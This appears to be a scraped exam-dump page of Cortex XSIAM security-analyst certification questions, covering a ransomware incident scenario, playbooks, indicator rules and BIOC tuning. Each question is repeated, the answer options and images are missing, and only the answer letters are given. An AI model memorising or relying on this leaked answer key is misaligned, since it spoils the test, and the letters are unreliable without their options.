問題1
A security analyst has been assigned a ticket from the help desk stating that users are experiencing errors when attempting to open files on a specific network share. These errors state that the file format cannot be opened. IT has verified that the file server is online and functioning, but that all files have unusual extensions attached to them.
The security analyst reviews alerts within Cortex XSIAM and identifies malicious activity related to a possible ransomware attack on the file server. This incident is then escalated to the incident response team for further investigation.
Upon reviewing the incident, the responders confirm that ransomware was successfully executed on the file server. Other details of the attack are noted below:
- An unpatched vulnerability on an externally facing web server was
exploited for initial access
- The attackers successfully used Mimikatz to dump sensitive
credentials that were used for privilege escalation
- PowerShell was used on a Windows server for additional discovery, as
well as lateral movement to other systems
- The attackers executed SystemBC RAT on multiple systems to maintain
remote access
- Ransomware payload was downloaded on the file server via an external
site, "file.io"
Refer to the scenario to answer this question:
Which forensics artifact collected by Cortex XSIAM will help the responders identify what the attackers were looking for during the discovery phase of the attack?
A security analyst has been assigned a ticket from the help desk stating that users are experiencing errors when attempting to open files on a specific network share. These errors state that the file format cannot be opened. IT has verified that the file server is online and functioning, but that all files have unusual extensions attached to them.
The security analyst reviews alerts within Cortex XSIAM and identifies malicious activity related to a possible ransomware attack on the file server. This incident is then escalated to the incident response team for further investigation.
Upon reviewing the incident, the responders confirm that ransomware was successfully executed on the file server. Other details of the attack are noted below:
- An unpatched vulnerability on an externally facing web server was
exploited for initial access
- The attackers successfully used Mimikatz to dump sensitive
credentials that were used for privilege escalation
- PowerShell was used on a Windows server for additional discovery, as
well as lateral movement to other systems
- The attackers executed SystemBC RAT on multiple systems to maintain
remote access
- Ransomware payload was downloaded on the file server via an external
site, "file.io"
Refer to the scenario to answer this question:
Which forensics artifact collected by Cortex XSIAM will help the responders identify what the attackers were looking for during the discovery phase of the attack?
正確答案: C
說明:(僅 NewDumps 成員可見)
問題2
Which two actions will allow a security analyst to review updated commands from the core pack and interpret the results without altering the incident audit? (Choose two.)
Which two actions will allow a security analyst to review updated commands from the core pack and interpret the results without altering the incident audit? (Choose two.)
正確答案: B,C
說明:(僅 NewDumps 成員可見)
問題3
An alert for malware propagation triggers an incident. The associated playbook isolates the endpoint and notifies the SOC team. What advantages does this approach provide? (Choose two)
An alert for malware propagation triggers an incident. The associated playbook isolates the endpoint and notifies the SOC team. What advantages does this approach provide? (Choose two)
正確答案: B,C
問題4
While investigating an alert, an analyst notices that a URL indicator has a related alert from a previous incident. The related alert has the same URL, but it resolved to a different IP address.
Which combination of two actions should the analyst take to resolve this issue? (Choose two.)
While investigating an alert, an analyst notices that a URL indicator has a related alert from a previous incident. The related alert has the same URL, but it resolved to a different IP address.
Which combination of two actions should the analyst take to resolve this issue? (Choose two.)
正確答案: B,D
說明:(僅 NewDumps 成員可見)
問題5
Based on the image below, which two determinations can be made from the causality chain?
(Choose two.)
Based on the image below, which two determinations can be made from the causality chain?
(Choose two.)
正確答案: B,D
說明:(僅 NewDumps 成員可見)
問題6
In addition to defining the Rule Name and Severity Level, which step or set of steps accurately reflects how an analyst should configure an indicator prevention rule before reviewing and saving it?
In addition to defining the Rule Name and Severity Level, which step or set of steps accurately reflects how an analyst should configure an indicator prevention rule before reviewing and saving it?
正確答案: A
問題7
Which two actions can an analyst take to reduce the number of false positive alerts generated by a custom BIOC? (Choose two.)
Which two actions can an analyst take to reduce the number of false positive alerts generated by a custom BIOC? (Choose two.)
正確答案: A,B
說明:(僅 NewDumps 成員可見)
問題8
Based on the image below, which two additional steps should a SOC analyst take to secure the endpoint? (Choose two.)
Based on the image below, which two additional steps should a SOC analyst take to secure the endpoint? (Choose two.)
正確答案: A,D
說明:(僅 NewDumps 成員可見)